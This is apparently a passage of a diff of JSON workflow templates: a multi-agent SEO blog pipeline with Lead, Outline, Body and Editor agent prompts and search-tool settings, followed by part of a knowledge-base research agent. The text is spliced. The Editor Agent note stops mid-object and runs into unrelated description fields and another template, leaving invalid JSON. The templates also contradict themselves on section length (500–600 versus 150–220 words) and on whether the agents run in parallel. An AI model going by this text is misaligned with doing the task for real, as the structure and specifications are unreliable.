"sys_prompt":"# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. 
Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Lead Agent"
},
"id":"Agent:LuckyApplesGrab",
"measured":{
"height":84,
"width":200
},
"position":{
"x":350,
"y":200
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"content":[
"{Agent:LuckyApplesGrab@content}"
]
},
"label":"Message",
"name":"Response"
},
"dragging":false,
"id":"Message:ModernSwansThrow",
"measured":{
"height":56,
"width":200
},
"position":{
"x":669.394830760932,
"y":190.72421137520644
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"messageNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title 
A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Outline Agent"
},
"dragging":false,
"id":"Agent:SlickSpidersTurn",
"measured":{
"height":84,
"width":200
},
"position":{
"x":100.60137004146719,
"y":411.67654846431367
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Body Agent"
},
"dragging":false,
"id":"Agent:IcyPawsRescue",
"measured":{
"height":84,
"width":200
},
"position":{
"x":439.3374395738501,
"y":366.1408588516909
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Editor Agent"
},
"dragging":false,
"id":"Agent:TenderAdsAllow",
"measured":{
"height":84,
"width":200
},
"position":{
"x":730.8513124709204,
"y":327.351197329827
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_0"
},
"dragging":false,
"id":"Tool:ThreeWallsRing",
"measured":{
"height":48,
"width":200
},
"position":{
"x":-26.93431957115564,
"y":531.4384641920368
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_1"
},
"dragging":false,
"id":"Tool:FloppyJokesItch",
"measured":{
"height":48,
"width":200
},
"position":{
"x":414.6786783453011,
"y":499.39483076093194
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"text":"This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI \u201cwriters\u201d, where each agent plays a specialized role \u2014 just like a real editorial team.\n\nInstead of one AI doing everything in order, this version uses a **Lead Agent** to assign tasks to different sub-agents, who then write and edit the blog in parallel. The Lead Agent manages everything and produces the final output.\n\n### Why use multi-agent format?\n\n- Better control over each stage of writing \n- Easier to reuse agents across tasks \n- More human-like workflow (planning \u2192 writing \u2192 editing \u2192 publishing) \n- Easier to scale and customize for advanced users\n\n### Flow Summary:\n\n1. `LeadWriter_Agent` takes your input and creates a plan\n2. It sends that plan to:\n - `OutlineWriter_Agent`: build blog structure\n - `BodyWriter_Agent`: write full content\n - `FinalEditor_Agent`: polish and finalize\n3. `LeadWriter_Agent` collects all results and outputs the final blog post\n"
},
"label":"Note",
"name":"Workflow Overall Description"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":208,
"id":"Note:ElevenVansInvent",
"measured":{
"height":208,
"width":518
},
"position":{
"x":-336.6586460874556,
"y":113.43253511344867
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":518
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis is the central agent that controls the entire writing process.\n\n**What it does**:\n- Reads your blog topic and intent\n- Generates a clear writing plan (topic, audience, goal, keywords)\n- Sends instructions to all sub-agents\n- Waits for their responses and checks quality\n- If any section is missing or weak, it can request a rewrite\n- Finally, it assembles all parts into a complete blog and sends it back to you\n"
},
"label":"Note",
"name":"Lead Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":146,
"id":"Note:EmptyClubsGreet",
"measured":{
"height":146,
"width":334
},
"position":{
"x":390.1408623279084,
"y":2.6521144030202493
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":334
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is responsible for building the blog's structure. It creates an outline that shows what the article will cover and how it's organized.\n\n**What it does**:\n- Suggests a blog title that matches the topic and keywords \n- Breaks the article into sections using H2 and H3 headers \n- Adds a short description of what each section should include \n- Assigns SEO keywords to each section for better search visibility \n- Uses search data (via Tavily Search) to find how similar blogs are structured"
},
"label":"Note",
"name":"Outline Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":157,
"id":"Note:CurlyTigersDouble",
"measured":{
"height":157,
"width":394
},
"position":{
"x":-60.03139680691618,
"y":595.8208080534818
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":394
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is in charge of writing the full blog content, section by section, based on the outline it receives.\n\n**What it does**:\n- Takes each section heading from the outline (H2 / H3)\n- Writes a complete paragraph (150\u2013220 words) under each section\n- Naturally includes the keywords provided for that section\n- Uses the Tavily Search tool to add real-world examples, definitions, or facts if needed\n- Makes sure each section is clear, useful, and easy to read\n"
},
"label":"Note",
"name":"Body Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":164,
"id":"Note:StrongKingsCamp",
"measured":{
"height":164,
"width":408
},
"position":{
"x":446.54943226110845,
"y":590.9443887062529
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":408
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent reviews, polishes, and finalizes the blog post written by the BodyWriter_Agent. It ensures everything is clean, smooth, and SEO-compliant.\n\n**What it does**:\n- Improves grammar, sentence flow, and transitions \n- Makes sure the content reads naturally and professionally \n- Checks whether keywords are present and well integrated (but not overused) \n- Verifies that the structure follows the correct H1/H2/H3 format \n"
"en":"A report generation assistant using local knowledge base, with advanced capabilities in task planning, reasoning, and reflective analysis. Recommended for academic research paper Q&A",
"de":"Ein Berichtsgenerierungsassistent, der eine lokale Wissensdatenbank nutzt, mit erweiterten Fähigkeiten in Aufgabenplanung, Schlussfolgerung und reflektierender Analyse. Empfohlen für akademische Forschungspapier-Fragen und -Antworten.",
"sys_prompt":"## Role & Task\nYou are a **\u201cKnowledge Base Retrieval Q\\&A Agent\u201d** whose goal is to break down the user\u2019s question into retrievable subtasks, and then produce a multi-source-verified, structured, and actionable research report using the internal knowledge base.\n## Execution Framework (Detailed Steps & Key Points)\n1. **Assessment & Decomposition**\n * Actions:\n * Automatically extract: main topic, subtopics, entities (people/organizations/products/technologies), time window, geographic/business scope.\n * Output as a list: N facts/data points that must be collected (*N* ranges from 5\u201320 depending on question complexity).\n2. **Query Type Determination (Rule-Based)**\n * Example rules:\n * If the question involves a single issue but requests \u201cmethod comparison/multiple explanations\u201d \u2192 use **depth-first**.\n * If the question can naturally be split into \u22653 independent sub-questions \u2192 use **breadth-first**.\n * If the question can be answered by a single fact/specification/definition \u2192 use **simple query**.\n3. **Research Plan Formulation**\n * Depth-first: define 3\u20135 perspectives (methodology/stakeholders/time dimension/technical route, etc.), assign search keywords, target document types, and output format for each perspective.\n * Breadth-first: list subtasks, prioritize them, and assign search terms.\n * Simple query: directly provide the search sentence and required fields.\n4. **Retrieval Execution**\n * After retrieval: perform coverage check (does it contain the key facts?) and quality check (source diversity, authority, latest update time).\n * If standards are not met, automatically loop: rewrite queries (synonyms/cross-domain terms) and retry \u22643 times, or flag as requiring external search.\n5. **Integration & Reasoning**\n * Build the answer using a **fact\u2013evidence\u2013reasoning** chain. 
For each conclusion, attach 1\u20132 strongest pieces of evidence.\n---\n## Quality Gate Checklist (Verify at Each Stage)\n* **Stage 1 (Decomposition)**:\n * [ ] Key concepts and expected outputs identified\n * [ ] Required facts/data points listed\n* **Stage 2 (Retrieval)**:\n * [ ] Meets quality standards (see above)\n * [ ] If not met: execute query iteration\n* **Stage 3 (Generation)**:\n * [ ] Each conclusion has at least one direct evidence source\n * [ ] State assumptions/uncertainties\n * [ ] Provide next-step suggestions or experiment/retrieval plans\n * [ ] Final length and depth match user expectations (comply with word count/format if specified)\n---\n## Core Principles\n1. **Strict reliance on the knowledge base**: answers must be **fully bounded** by the content retrieved from the knowledge base.\n2. **No fabrication**: do not generate, infer, or create information that is not explicitly present in the knowledge base.\n3. **Accuracy first**: prefer incompleteness over inaccurate content.\n4. **Output format**:\n * Hierarchically clear modular structure\n * Logical grouping according to the MECE principle\n * Professionally presented formatting\n * Step-by-step cognitive guidance\n * Reasonable use of headings and dividers for clarity\n * *Italicize* key parameters\n * **Bold** critical information\n5. **LaTeX formula requirements**:\n * Inline formulas: start and end with `$`\n * Block formulas: start and end with `$$`, each `$$` on its own line\n * Block formula content must comply with LaTeX math syntax\n * Verify formula correctness\n---\n## Additional Notes (Interaction & Failure Strategy)\n* If the knowledge base does not cover critical facts: explicitly inform the user (with sample wording)\n* For time-sensitive issues: enforce time filtering in the search request, and indicate the latest retrieval date in the answer.\n* Language requirement: answer in the user\u2019s preferred language\n",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[
{
"component_name":"Retrieval",
"name":"Retrieval",
"params":{
"cross_languages":[],
"description":"",
"empty_response":"",
"kb_ids":[],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Knowledge Base Agent"
},
"dragging":false,
"id":"Agent:NewPumasLick",
"measured":{
"height":84,
"width":200
},
"position":{
"x":347.00048227952215,
"y":186.49109364794631
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
Some files were not shown because too many files have changed in this diff
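When reviewing template hunks like the ones above, it can help to reduce each node to the few fields that matter (name, temperature, attached tools). The following is a minimal sketch, not part of the PR: `SAMPLE_NODES` is a hypothetical, trimmed excerpt shaped like the node entries in the diff, and `summarize_agents` is an illustrative helper name. Because `temperature` appears as a number in some nodes and as the string `"0.1"` in another, the sketch coerces it with `float()`.

```python
import json

# Hypothetical excerpt shaped like the node entries in the diff above;
# only the fields the helper reads are included.
SAMPLE_NODES = json.loads("""
[
  {"id": "Agent:IcyPawsRescue", "type": "agentNode",
   "data": {"name": "Body Agent",
            "form": {"temperature": 0.2,
                     "tools": [{"component_name": "TavilySearch"}]}}},
  {"id": "Agent:TenderAdsAllow", "type": "agentNode",
   "data": {"name": "Editor Agent",
            "form": {"temperature": 0.2, "tools": []}}},
  {"id": "Agent:NewPumasLick", "type": "agentNode",
   "data": {"name": "Knowledge Base Agent",
            "form": {"temperature": "0.1",
                     "tools": [{"component_name": "Retrieval"}]}}},
  {"id": "Note:StrongKingsCamp", "type": "noteNode",
   "data": {"name": "Body Agent", "form": {"text": "..."}}}
]
""")


def summarize_agents(nodes):
    """Return one summary dict per node whose type is "agentNode"."""
    summaries = []
    for node in nodes:
        if node.get("type") != "agentNode":
            continue  # skip note and tool nodes
        data = node.get("data", {})
        form = data.get("form", {})
        raw_temp = form.get("temperature")
        summaries.append({
            "id": node.get("id"),
            "name": data.get("name"),
            # Accept both numeric and string temperatures.
            "temperature": float(raw_temp) if raw_temp is not None else None,
            "tools": [t.get("component_name") for t in form.get("tools", [])],
        })
    return summaries


if __name__ == "__main__":
    for row in summarize_agents(SAMPLE_NODES):
        print(row)
```

Run against a full template file, a summary like this makes it easier to spot nodes whose tool list or sampling settings differ from what the accompanying notes describe.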